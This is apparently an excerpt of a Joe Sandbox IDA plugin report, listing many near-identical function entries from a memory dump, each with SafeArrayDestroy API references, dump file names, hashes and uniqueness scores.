Function 6CE491A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: f98c91bb9ada03c40300bc665fd234f3d44024bb57547e87ec4f312de020554a
Instruction ID: f74e0ae019b4fdce6b4d19c77af239ba842a26a8cf8a6c8ea53d6846ffb1757a
Opcode Fuzzy Hash: f98c91bb9ada03c40300bc665fd234f3d44024bb57547e87ec4f312de020554a
Instruction Fuzzy Hash: F2313770A016189FCB00CBA8DD80F9EB7B9AF89218F30859AE419E7741CB75E9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE49118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9291255a228972fbca56ca62b7536949e827b7b1839b577b4e9208f617afa5bf
Instruction ID: 5b78c58cb6f9819d4bd7e846465defa0ce529c555842f56ac4b1f25b817fcc98
Opcode Fuzzy Hash: 9291255a228972fbca56ca62b7536949e827b7b1839b577b4e9208f617afa5bf
Instruction Fuzzy Hash: D3313671A016089FCB00CBA8DD80B9EB7B9AF89218F70859AE519E7741CB71E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE492C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: cd162904e8a4ec094940e31793c4d516ceaeaf5ec341413ed3417294c0f0b2c4
Instruction ID: b9d84ff8c624a5df0f79b83b2a049b90a776b9caf233b77be57f0085c1d3618e
Opcode Fuzzy Hash: cd162904e8a4ec094940e31793c4d516ceaeaf5ec341413ed3417294c0f0b2c4
Instruction Fuzzy Hash: 4F314870E016089FCB00CFA8D980F9EB7B9AF89218F30859AE419E7751C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE49237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6fee0695d61f9744dc9f243c80a0ab02a20def2320a5c980c3924048140a28d5
Instruction ID: 5a77e39fc7235a7db50368db9927876edfd93b0b7aee244fcde4f7e995606829
Opcode Fuzzy Hash: 6fee0695d61f9744dc9f243c80a0ab02a20def2320a5c980c3924048140a28d5
Instruction Fuzzy Hash: A3313670A016189FCB00DBA8D980B9EB7B9AF89218F30859AE419E7741CB71E9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 68a449b42135d03293cb21d54b59da2ba2263dd4f91d11e8d211689c19805ef2
Instruction ID: 243f3176c81795d1eb8f9cf9b23705b0e977558f61872a226f7d76ab5f41a588
Opcode Fuzzy Hash: 68a449b42135d03293cb21d54b59da2ba2263dd4f91d11e8d211689c19805ef2
Instruction Fuzzy Hash: EF314970E416189FDB10DBA8DC80F9EB7B9AF85218F34859AE419E7741C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 78b6f2ae950f60d0ad6665e1c4fe758dc3e8da204e31234d1cf544d0d188f5b0
Instruction ID: 6ce9b721089427fbb98bb7667b8e5bb38dc79ab5f53cc5bed9bb599e7f1dd1c1
Opcode Fuzzy Hash: 78b6f2ae950f60d0ad6665e1c4fe758dc3e8da204e31234d1cf544d0d188f5b0
Instruction Fuzzy Hash: 98313970A016189FCB10CBA8DC80B9EB7B9AF85214F70869AE429E7741C771E9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 30f01f81f58d622cd5c57f81d1d37d254159e8a58c20a0afdfeebddcec544ea0
Instruction ID: c84bc81b8a78eb02d86a9fa761931ba0865cfcfb324458d02e0568cafb5e7f50
Opcode Fuzzy Hash: 30f01f81f58d622cd5c57f81d1d37d254159e8a58c20a0afdfeebddcec544ea0
Instruction Fuzzy Hash: 04311A71E016189FCB10CBA8DC80F9EB7B9AF85214F74869AE419E7745C771E9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 651f765e1b846a63567b4b815bb83dcfd5a8a74ca35d3947641dbb3e8d66b2b7
Instruction ID: f9828adf8901075d18b07c0f527a2727ce7d0e5cf25f72f7020fd508d0a54b6b
Opcode Fuzzy Hash: 651f765e1b846a63567b4b815bb83dcfd5a8a74ca35d3947641dbb3e8d66b2b7
Instruction Fuzzy Hash: FF313770A016189FCB10CBA8DC80F9EB7BAAF85218F34869AE519E7741C771E9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: ac0d3787cc14527acad2a55d3694bb6f7f4d0a8e60a0e349341cb3bb122ca1b6
Instruction ID: 609e3119c24510985ddeed2cf7490703c681998fdfce239b369c15b855203156
Opcode Fuzzy Hash: ac0d3787cc14527acad2a55d3694bb6f7f4d0a8e60a0e349341cb3bb122ca1b6
Instruction Fuzzy Hash: 35315C70E016189FCB10CBA8DC80F9EB7B9AF89218F70859AE419E7741C775E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 432e511e66a59e7d90fd824c01476f9e09f687b5c48fc1bb6cae8089ae29e04f
Instruction ID: 7363f9a2ca6266eecbed30bc993a35072390263fb4a44485566d079976ebf691
Opcode Fuzzy Hash: 432e511e66a59e7d90fd824c01476f9e09f687b5c48fc1bb6cae8089ae29e04f
Instruction Fuzzy Hash: 3F315AB0E416189FCB10CBA8DC80F9EB7B9AF85218F34859AE429E7741C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 86b618799773fff9086da9d4fe3351692008ab0e15923f1395fecaec6ea27bd6
Instruction ID: eebc792a5d18d018a97474b05598b39b8645173b7d062aa5289fe137947715cb
Opcode Fuzzy Hash: 86b618799773fff9086da9d4fe3351692008ab0e15923f1395fecaec6ea27bd6
Instruction Fuzzy Hash: 99314DB0E016189FCB10DBA9DC84B9DB7BAAF95304F30859AE518E7741C771DD418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE400B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 432e511e66a59e7d90fd824c01476f9e09f687b5c48fc1bb6cae8089ae29e04f
Instruction ID: 1553b3adc715a82a9a9084755be06842be3646805c2c9da19aafc1ea6641987e
Opcode Fuzzy Hash: 432e511e66a59e7d90fd824c01476f9e09f687b5c48fc1bb6cae8089ae29e04f
Instruction Fuzzy Hash: 72311AB1A016189FCB10DBA9DC84B9DB7BAAF95204F34859AE418E7741CB71ED818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE401BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 68a449b42135d03293cb21d54b59da2ba2263dd4f91d11e8d211689c19805ef2
Instruction ID: d871ac00d93e21a5700ef7ea259d221bd771ab80fe3cacd5147e8e7ddc62e223
Opcode Fuzzy Hash: 68a449b42135d03293cb21d54b59da2ba2263dd4f91d11e8d211689c19805ef2
Instruction Fuzzy Hash: 27314BB0E016189FDB10DBA9DC84B9DB7BAAF95208F34859AE418E7742C771ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE402C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
